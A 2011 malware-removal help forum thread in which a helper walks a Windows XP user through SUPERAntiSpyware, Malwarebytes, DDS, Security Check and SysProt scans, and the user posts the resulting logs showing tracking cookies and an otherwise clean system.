Please leave the others unchecked

•Click the Close button to leave the control center screen.

* On the main screen click Scan your computer
* On the left check the box for the drive you are scanning.
* On the right choose Perform Complete Scan
* Click Next to start the scan. Please be patient while it scans your computer.
* After the scan is complete a summary box will appear. Click OK
* Make sure everything in the white box has a check next to it, then click Next
* It will quarantine what it found and if it asks if you want to reboot, click Yes

•To retrieve the removal information please do the following:
•After reboot, double-click the SUPERAntiSpyware icon on your desktop.
•Click Preferences. Click the Statistics/Logs tab.

•Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.

•It will open in your default text editor (preferably Notepad).
•Save the notepad file to your desktop by clicking (in notepad) File > Save As...

* Save the log somewhere you can easily find it. (normally the desktop)
* Click close and close again to exit the program.
*Copy and Paste the log in your post.
*********************************************
Please download Malwarebytes Anti-Malware from here.
Double Click mbam-setup.exe to install the application.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Perform Full Scan", then click Scan.
  • The scan may take some time to finish,so please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Extra Note)
  • Please save the log to a location you will remember.
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
  • Copy and paste the entire report in your next reply.
Extra Note:

If MBAM encounters a file that is difficult to remove,you will be presented with 1 of 2 prompts,click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately.
*********************************************************
Download DDS from HERE or HERE and save it to your desktop.

Vista users right click on dds and select Run as administrator (you will receive a UAC prompt, please allow it)

* XP users Double click on dds to run it.
* If your antivirus or firewall try to block DDS then please allow it to run.
* When finished DDS will open two (2) logs.

1) DDS.txt
2) Attach.txt

* Save both logs to your desktop.
* Please copy and paste the entire contents of both logs in your next reply.

Note: DDS will instruct you to post the Attach.txt log as an attachment.
Please just post it as you would any other log by copying and pasting it into the reply.Thank you SD.
Can l just point out that l did have MSE and AVG Firewall but these were both removed. They are no longer in msconfig, don't appear in task manager, and l have reoved all folders. Can't see why Combofix is still highlighting these??
Anyway, logs requested are as follows -

SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 06/16/2011 at 03:29 PM

Application Version : 4.54.1000

Core Rules Database Version : 7274
Trace Rules Database Version: 5086

Scan type : Complete Scan
Total Scan Time : 00:17:21

Memory items scanned : 378
Memory threats detected : 0
Registry items scanned : 5460
Registry threats detected : 0
File items scanned : 36531
File threats detected : 32

Adware.Tracking Cookie
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][1].txt
C:\Documents and Settings\briann\Cookies\[emailprotected][2].txt

Malwarebytes' Anti-Malware 1.51.0.1200
www.malwarebytes.org

Database version: 6870

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

16/06/2011 15:42:25
mbam-log-2011-06-16 (15-42-25).txt

Scan type: Full scan (C:\|)
Objects scanned: 182958
Time elapsed: 6 minute(s), 58 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

.
DDS (Ver_2011-06-12.02) - NTFSx86
Internet Explorer: 8.0.6001.18702
Run by briann at 15:43:53 on 2011-06-16
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.3327.2582 [GMT 2:00]
.
AV: avast! Antivirus *Enabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
AV: Microsoft Security Essentials *Disabled/Updated* {BCF43643-A118-4432-AEDE-D861FCBCFCDF}
FW: AVG Firewall *Disabled*
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\Common Files\Acronis\CDP\afcdpsrv.exe
C:\WINDOWS\system32\svchost.exe -k hpdevmgmt
C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Program Files\AVAST Software\Avast\avastUI.exe
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://portail.free.fr/
mURLSearchHooks: H - No File
BHO: HP Print Enhancer: {0347c33e-8762-4905-bf09-768834316c61} - c:\program files\hp\digital imaging\smart web printing\hpswp_printenhancer.dll
BHO: avast! WebRep: {8e5e2654-ad2d-48bf-ac2d-d17f00898d06} - c:\program files\avast software\avast\aswWebRepIE.dll
BHO: WOT Helper: {c920e44a-7f78-4e64-bdd7-a57026e7feb7} - c:\program files\wot\WOT.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
BHO: JQSIEStartDetectorImpl Class: {e7e6f031-17ce-4c07-bc86-eabfe594f69c} - c:\program files\java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
BHO: HP Smart BHO Class: {ffffffff-cf4e-4f2b-bdc2-0e72e116a856} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
TB: WOT: {71576546-354d-41c9-aae8-31f2ec22bf0d} - c:\program files\wot\WOT.dll
TB: avast! WebRep: {8e5e2654-ad2d-48bf-ac2d-d17f00898d06} - c:\program files\avast software\avast\aswWebRepIE.dll
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
mRun: [SunJavaUpdateSched] c:\program files\common files\java\java update\jusched.exe
mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray
mRun: [avast] "c:\program files\avast software\avast\avastUI.exe" /nogui
mPolicies-system: EnableLinkedConnections = 1 (0x1)
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: DhcpNameServer = 212.27.40.241 212.27.40.240
TCP: Interfaces\{381EBDF8-7D99-4A61-A37E-CDBB7702D333} : DhcpNameServer = 212.27.40.241 212.27.40.240
Handler: wot - {C2A44D6B-CB9F-4663-88A6-DF2F26E4D952} - c:\program files\wot\WOT.dll
SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program files\superantispyware\SASSEH.DLL
.
============= SERVICES / DRIVERS ===============
.
R0 tdrpman273;Acronis Try&Decide and Restore Points filter (build 273);c:\windows\system32\drivers\tdrpm273.sys [2011-5-8 752128]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2011-6-6 441176]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2011-6-6 307928]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2010-2-17 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2010-5-10 67656]
R2 afcdpsrv;Acronis Nonstop Backup Service;c:\program files\common files\acronis\cdp\afcdpsrv.exe [2011-5-8 3246040]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2011-6-6 19544]
R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2011-6-6 42184]
R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-10-6 366640]
R3 afcdp;afcdp;c:\windows\system32\drivers\afcdp.sys [2011-5-8 167968]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-10-6 22712]
S1 MpKsl27aa9cbe;MpKsl27aa9cbe;\??\c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{5cbe358e-fb9e-42b0-91c3-0ed11a46499b}\mpksl27aa9cbe.sys --> c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{5cbe358e-fb9e-42b0-91c3-0ed11a46499b}\MpKsl27aa9cbe.sys [?]
S1 MpKsl4965f692;MpKsl4965f692;\??\c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{b94c2a1f-2a70-45b2-8bdb-24a63750906f}\mpksl4965f692.sys --> c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{b94c2a1f-2a70-45b2-8bdb-24a63750906f}\MpKsl4965f692.sys [?]
S1 MpKsl82abaab5;MpKsl82abaab5;\??\c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{f553cfb7-36b1-404e-8dc1-3f6e5d6a268a}\mpksl82abaab5.sys --> c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{f553cfb7-36b1-404e-8dc1-3f6e5d6a268a}\MpKsl82abaab5.sys [?]
S1 MpKsla6a28098;MpKsla6a28098;c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{e3544fd3-0e42-4b6d-875f-784ae3705a58}\MpKsla6a28098.sys [2011-3-30 28752]
S2 KMService;KMService;c:\windows\system32\srvany.exe [2010-11-21 8192]
S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [2010-10-6 1684736]
S3 appliandMP;appliandMP;

S3 MSICDSetup;MSICDSetup;\??\d:\cdriver.sys --> d:\CDriver.sys [?]
.
=============== Created Last 30 ================
.
2011-06-16 12:55:4098816----a-w-c:\windows\sed.exe
2011-06-16 12:55:40518144----a-w-c:\windows\SWREG.exe
2011-06-16 12:55:40256512----a-w-c:\windows\PEV.exe
2011-06-16 12:55:40208896----a-w-c:\windows\MBR.exe
2011-06-16 12:47:43--------d-----w-c:\documents and settings\briann\application data\SUPERAntiSpyware.com
2011-06-16 12:47:43--------d-----w-c:\documents and settings\all users\application data\SUPERAntiSpyware.com
2011-06-16 12:47:38--------d-----w-c:\program files\SUPERAntiSpyware
2011-06-16 00:24:22--------d-----w-c:\windows\SxsCaPendDel
2011-06-15 15:40:33--------d-sha-r-C:\cmdcons
2011-06-12 22:56:56--------d-----w-c:\documents and settings\all users\application data\IObit
2011-06-12 22:55:18--------d-----w-c:\documents and settings\briann\application data\IObit
2011-06-11 06:05:25404640----a-w-c:\windows\system32\FlashPlayerCPLApp.cpl
2011-06-07 17:44:03--------d-----w-c:\documents and settings\briann\application data\Rovio
2011-06-06 09:22:19441176----a-w-c:\windows\system32\drivers\aswSnx.sys
2011-06-06 09:22:1340112----a-w-c:\windows\avastSS.scr
2011-06-06 09:22:08--------d-----w-c:\program files\AVAST Software
2011-06-05 21:48:22--------d-----w-c:\documents and settings\briann\application data\A0261641-01B1-467E-9DE5-2FFFBF73C059
2011-06-02 19:00:56--------d--h--w-c:\documents and settings\all users\application data\Common Files
2011-06-02 18:48:00--------d-----w-c:\documents and settings\all users\application data\MFAData
2011-05-29 17:25:52--------d-----w-C:\DVDVideoSoft
2011-05-19 15:46:51--------d-----w-c:\windows\system32\wbem\repository\FS
2011-05-19 15:46:51--------d-----w-c:\windows\system32\wbem\Repository
.
==================== Find3M ====================
.
2011-06-05 21:48:22167968----a-w-c:\windows\system32\drivers\afcdp.sys
2011-06-05 21:48:19752128----a-w-c:\windows\system32\drivers\tdrpm273.sys
2011-06-05 21:48:18600928----a-w-c:\windows\system32\drivers\timntr.sys
2011-05-29 07:11:3039984----a-w-c:\windows\system32\drivers\mbamswissarmy.sys
2011-05-29 07:11:2022712----a-w-c:\windows\system32\drivers\mbam.sys
2011-05-08 21:19:24170528----a-w-c:\windows\system32\drivers\snapman.sys
2011-05-02 15:31:52692736----a-w-c:\windows\system32\inetcomm.dll
2011-04-29 16:19:43456320----a-w-c:\windows\system32\drivers\mrxsmb.sys
2011-04-25 16:11:12916480----a-w-c:\windows\system32\wininet.dll
2011-04-25 16:11:1143520----a-w-c:\windows\system32\licmgr10.dll
2011-04-25 16:11:111469440------w-c:\windows\system32\inetcpl.cpl
2011-04-25 12:01:22385024----a-w-c:\windows\system32\html.iec
2011-04-21 13:37:43105472----a-w-c:\windows\system32\drivers\mup.sys
.
============= FINISH: 15:45:53.62 ===============

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2011-06-12.02)
.
Microsoft Windows XP Home Edition
Boot Device: \Device\HarddiskVolume2
Install Date: 07/10/2010 07:12:24
System Uptime: 16/06/2011 15:00:58 (0 hours ago)
.
Motherboard: MICRO-STAR INTERNATIONAL CO.,LTD | | 760GM -E51 (MS-7596)
Processor: AMD Sempron(tm) 140 Processor | CPU1 | 3105/200mhz
.
==== Disk Partitions =========================
.
A: is Removable
C: is FIXED (NTFS) - 49 GiB total, 33.387 GiB free.
D: is FIXED (NTFS) - 466 GiB total, 441.431 GiB free.
E: is CDROM ()
F: is FIXED (NTFS) - 416 GiB total, 310.061 GiB free.
G: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP1: 16/06/2011 14:55:43 - System Checkpoint
.
==== Installed Programs ======================
.
32 Bit HP CIO Components Installer
AcronisTrueImageHome 2011
Adobe Flash Player 10 ActiveX
Adobe Flash Player 10 Plugin
Any Video Converter 3.2.3
ATI - Software Uninstall Utility
ATI AVIVO Codecs
ATI Catalyst Control Center
ATI Display Driver
Auslogics Registry Cleaner
avast! Free Antivirus
BufferChm
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Localization All
ccc-core-preinstall
ccc-core-static
ccc-utility
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
ConvertXtoDVD 3.4.7.121
Copy
CustomerResearchQFolder
DC++ 0.689
DeepBurner v1.9.0.228
Defraggler
Destination Component
Device drivers for Simple Backup
DeviceDiscovery
DeviceManagementQFolder
DJ_AIO_03_F2200_ProductContext
DJ_AIO_03_F2200_Software
DJ_AIO_03_F2200_Software_Min
DocProc
DocProcQFolder
EasyCleaner
eSupportQFolder
F2200
F2200_Help
Foxit Reader
Free Video Dub version 1.8
GPBaseService
High Definition Audio Driver Package - KB835221
HiJackThis
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Hotfix for Windows XP (KB2158563)
Hotfix for Windows XP (KB2443685)
Hotfix for Windows XP (KB952287)
Hotfix for Windows XP (KB961118)
HP Customer Participation Program 10.0
HP Deskjet F2200 All-In-One Driver Software 10.0 Rel .3
HP Imaging Device Functions 10.0
HP Smart Web Printing
HP Solution Center 10.0
HPDiagnosticAlert
HPPhotoSmartDiscLabelContent1
HPProductAssistant
HPSSupply
ImgBurn
Java Auto Updater
Java(TM) 6 Update 24
K-Lite Codec Pack 4.7.5 (Full)
Malwarebytes' Anti-Malware version 1.51.0.1200
MarketResearch
MFC RunTime files
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5 SP1
Microsoft Application Error Reporting
Microsoft Office 97, Professional Edition
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
MiPony 1.3.0
MozBackup 1.4.10
Mozilla Thunderbird (3.1.10)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
OCR Software by I.R.I.S. 10.0
PartitionMagic
PCI Audio Driver
Picture Collage Maker
PowerQuest PartitionMagic 8.0
PSSWCORE
RealPlayer
REALTEK GbE & FE Ethernet PCI-E NIC Driver
Realtek High Definition Audio Driver
RealUpgrade 1.0
Recuva
Replay Media Catcher 4
Replay Music
Scan
Screen Capturer
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2416473)
Security Update for Windows Internet Explorer 8 (KB2183461)
Security Update for Windows Internet Explorer 8 (KB2360131)
Security Update for Windows Internet Explorer 8 (KB2416400)
Security Update for Windows Internet Explorer 8 (KB2482017)
Security Update for Windows Internet Explorer 8 (KB2497640)
Security Update for Windows Internet Explorer 8 (KB2510531)
Security Update for Windows Internet Explorer 8 (KB2530548)
Security Update for Windows Internet Explorer 8 (KB2544521)
Security Update for Windows Internet Explorer 8 (KB971961)
Security Update for Windows Internet Explorer 8 (KB981332)
Security Update for Windows Internet Explorer 8 (KB982381)
Security Update for Windows Media Player (KB2378111)
Security Update for Windows Media Player (KB952069)
Security Update for Windows Media Player (KB954155)
Security Update for Windows Media Player (KB973540)
Security Update for Windows Media Player (KB975558)
Security Update for Windows Media Player (KB978695)
Security Update for Windows Media Player (KB979402)
Security Update for Windows XP (KB2079403)
Security Update for Windows XP (KB2115168)
Security Update for Windows XP (KB2121546)
Security Update for Windows XP (KB2160329)
Security Update for Windows XP (KB2183461)
Security Update for Windows XP (KB2229593)
Security Update for Windows XP (KB2259922)
Security Update for Windows XP (KB2279986)
Security Update for Windows XP (KB2286198)
Security Update for Windows XP (KB2296011)
Security Update for Windows XP (KB2296199)
Security Update for Windows XP (KB2347290)
Security Update for Windows XP (KB2360937)
Security Update for Windows XP (KB2387149)
Security Update for Windows XP (KB2393802)
Security Update for Windows XP (KB2412687)
Security Update for Windows XP (KB2419632)
Security Update for Windows XP (KB2423089)
Security Update for Windows XP (KB2436673)
Security Update for Windows XP (KB2440591)
Security Update for Windows XP (KB2443105)
Security Update for Windows XP (KB2476490)
Security Update for Windows XP (KB2476687)
Security Update for Windows XP (KB2478960)
Security Update for Windows XP (KB2478971)
Security Update for Windows XP (KB2479628)
Security Update for Windows XP (KB2479943)
Security Update for Windows XP (KB2481109)
Security Update for Windows XP (KB2483185)
Security Update for Windows XP (KB2485376)
Security Update for Windows XP (KB2485663)
Security Update for Windows XP (KB2503658)
Security Update for Windows XP (KB2503665)
Security Update for Windows XP (KB2506212)
Security Update for Windows XP (KB2506223)
Security Update for Windows XP (KB2507618)
Security Update for Windows XP (KB2508272)
Security Update for Windows XP (KB2508429)
Security Update for Windows XP (KB2509553)
Security Update for Windows XP (KB2511455)
Security Update for Windows XP (KB2524375)
Security Update for Windows XP (KB2535512)
Security Update for Windows XP (KB2536276)
Security Update for Windows XP (KB2544893)
Security Update for Windows XP (KB923561)
Security Update for Windows XP (KB923789)
Security Update for Windows XP (KB946648)
Security Update for Windows XP (KB950760)
Security Update for Windows XP (KB950762)
Security Update for Windows XP (KB950974)
Security Update for Windows XP (KB951376-v2)
Security Update for Windows XP (KB951748)
Security Update for Windows XP (KB952004)
Security Update for Windows XP (KB952954)
Security Update for Windows XP (KB954459)
Security Update for Windows XP (KB956572)
Security Update for Windows XP (KB956744)
Security Update for Windows XP (KB956802)
Security Update for Windows XP (KB956803)
Security Update for Windows XP (KB956844)
Security Update for Windows XP (KB958644)
Security Update for Windows XP (KB958869)
Security Update for Windows XP (KB959426)
Security Update for Windows XP (KB960803)
Security Update for Windows XP (KB960859)
Security Update for Windows XP (KB961501)
Security Update for Windows XP (KB969059)
Security Update for Windows XP (KB970430)
Security Update for Windows XP (KB971657)
Security Update for Windows XP (KB971961)
Security Update for Windows XP (KB972270)
Security Update for Windows XP (KB973507)
Security Update for Windows XP (KB973869)
Security Update for Windows XP (KB973904)
Security Update for Windows XP (KB974112)
Security Update for Windows XP (KB974318)
Security Update for Windows XP (KB974392)
Security Update for Windows XP (KB974571)
Security Update for Windows XP (KB975025)
Security Update for Windows XP (KB975467)
Security Update for Windows XP (KB975560)
Security Update for Windows XP (KB975562)
Security Update for Windows XP (KB975713)
Security Update for Windows XP (KB977816)
Security Update for Windows XP (KB977914)
Security Update for Windows XP (KB978037)
Security Update for Windows XP (KB978338)
Security Update for Windows XP (KB978542)
Security Update for Windows XP (KB978601)
Security Update for Windows XP (KB978706)
Security Update for Windows XP (KB979309)
Security Update for Windows XP (KB979482)
Security Update for Windows XP (KB979687)
Security Update for Windows XP (KB980195)
Security Update for Windows XP (KB980218)
Security Update for Windows XP (KB980232)
Security Update for Windows XP (KB980436)
Security Update for Windows XP (KB981322)
Security Update for Windows XP (KB981349)
Security Update for Windows XP (KB981852)
Security Update for Windows XP (KB981957)
Security Update for Windows XP (KB981997)
Security Update for Windows XP (KB982132)
Security Update for Windows XP (KB982214)
Security Update for Windows XP (KB982665)
Security Update for Windows XP (KB982802)
Shop for HP Supplies
Skins
SmartWebPrintingOC
SolutionCenter
Speccy
Spotify
SpywareBlaster 4.4
Status
SUPERAntiSpyware
SureThing CD Labeler Deluxe
TeamViewer 6
Toolbox
TrayApp
Ultra Video Joiner 4.7.1127
Uninstall 1.0.0.1
UnloadSupport
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Windows Internet Explorer 8 (KB2362765)
Update for Windows Internet Explorer 8 (KB976662)
Update for Windows XP (KB2141007)
Update for Windows XP (KB2345886)
Update for Windows XP (KB2467659)
Update for Windows XP (KB898461)
Update for Windows XP (KB951978)
Update for Windows XP (KB955759)
Update for Windows XP (KB967715)
Update for Windows XP (KB968389)
Update for Windows XP (KB971029)
Update for Windows XP (KB971737)
Update for Windows XP (KB973687)
Update for Windows XP (KB973815)
VideoToolkit01
WebFldrs XP
WebReg
Windows Internet Explorer 8
Windows PowerShell(TM) 1.0
WinRAR archiver
WOT for Internet Explorer
.
==== Event Viewer Messages From Past Week ========
.
16/06/2011 14:56:56, error: Service Control Manager [7034] - The Print Spooler service terminated unexpectedly. It has done this 1 time(s).
16/06/2011 14:56:56, error: Service Control Manager [7034] - The Application Layer Gateway Service service terminated unexpectedly. It has done this 1 time(s).
15/06/2011 23:14:51, error: Service Control Manager [7023] - The Application Management service terminated with the following error: The specified module could not be found.
14/06/2011 23:21:05, error: Dhcp [1002] - The IP address lease 82.248.195.76 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.248.195.254 (The DHCP Server sent a DHCPNACK message).
13/06/2011 23:20:34, error: Dhcp [1002] - The IP address lease 83.159.15.236 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 83.159.15.254 (The DHCP Server sent a DHCPNACK message).
12/06/2011 23:20:51, error: Dhcp [1002] - The IP address lease 82.251.231.98 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.251.231.254 (The DHCP Server sent a DHCPNACK message).
12/06/2011 08:00:41, error: Service Control Manager [7022] - The HP CUE DeviceDiscovery Service service hung on starting.
12/06/2011 01:14:11, error: Service Control Manager [7034] - The MBAMService service terminated unexpectedly. It has done this 1 time(s).
12/06/2011 01:14:11, error: Service Control Manager [7034] - The Acronis Nonstop Backup Service service terminated unexpectedly. It has done this 1 time(s).
12/06/2011 00:13:16, error: PlugPlayManager [11] - The device Root\LEGACY_SASKUTIL\0000 disappeared from the system without first being prepared for removal.
12/06/2011 00:13:16, error: PlugPlayManager [11] - The device Root\LEGACY_SASDIFSV\0000 disappeared from the system without first being prepared for removal.
11/06/2011 23:20:27, error: Dhcp [1002] - The IP address lease 82.64.79.130 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.64.79.254 (The DHCP Server sent a DHCPNACK message).
10/06/2011 23:20:25, error: Dhcp [1002] - The IP address lease 82.253.220.111 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.253.220.254 (The DHCP Server sent a DHCPNACK message).
09/06/2011 23:20:01, error: Dhcp [1002] - The IP address lease 82.64.209.201 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.64.209.254 (The DHCP Server sent a DHCPNACK message).
.
==== End Of File ===========================Registry cleaners are extremely powerful applications and their potential for harming your OS far outweighs any small potential for improving your computer's performance.
Auslogics Registry Cleaner
There are a number of them available and some are more safe than others. Keep in mind that no two registry cleaners work entirely the same way. Each vendor uses different criteria as to what constitutes a "bad" entry. One cleaner may find entries on your system that will not cause a problem when removed, another may not find the same entries, and still another may want to remove entries required for a program to work. Without research into what the registry entry selected for deletion is, a registry cleaner can end up being an automated method to cause problems with the registry.

For routine use by those not familiar with the registry, the benefits to your computer are negligible while the potential risks are great.

Further reading: XP Fixes Myth #1: Registry Cleaners
******************************************************
Download Security Check by screen317 from one of the following links and save it to your desktop.

Link 1
Link 2

* Unzip SecurityCheck.zip and a folder named Security Check should appear.
* Open the Security Check folder and double-click Security Check.bat
* Follow the on-screen instructions inside of the black box.
* A Notepad document should open automatically called checkup.txt
* Post the contents of that document in your next reply.

Note: If a security program requests permission from dig.exe to access the Internet, allow it to do so.
*****************************************************
SysProt Antirootkit

Download
SysProt Antirootkit from the link below (you will find it at the bottom
of the page under attachments, or you can get it from one of the
mirrors).

http://sites.google.com/site/sysprotantirootkit/

Unzip it into a folder on your desktop.
  • Double click Sysprot.exe to start the program.
  • Click on the Log tab.
  • In the Write to log box select the following items.
    • Process << Selected
    • Kernel Modules << Selected
    • SSDT << Selected
    • Kernel Hooks << Selected
    • IRP Hooks << NOT Selected
    • Ports << NOT Selected
    • Hidden Files << Selected
  • At the bottom of the page
    • Hidden Objects Only << Selected
  • Click on the Create Log button on the bottom right.
  • After a few seconds a new window should appear.
  • Select Scan Root Drive. Click on the Start button.
  • When it is complete a new window will appear to indicate that the scan is finished.
  • The log will be saved automatically in the same folder Sysprot.exe was extracted to. Open the text file and copy/paste the log here.
Thanks SD, logs as requested.

Results of screen317's Security Check version 0.99.13
Windows XP Service Pack 3
Internet Explorer 8
``````````````````````````````
Antivirus/Firewall Check:
Windows Firewall Enabled!
avast! Free Antivirus
```````````````````````````````
Anti-malware/Other Utilities Check:
Malwarebytes' Anti-Malware
CCleaner
Auslogics Registry Cleaner
EasyCleaner
Java(TM) 6 Update 24
Out of date Java installed!
Flash Player Out of Date!
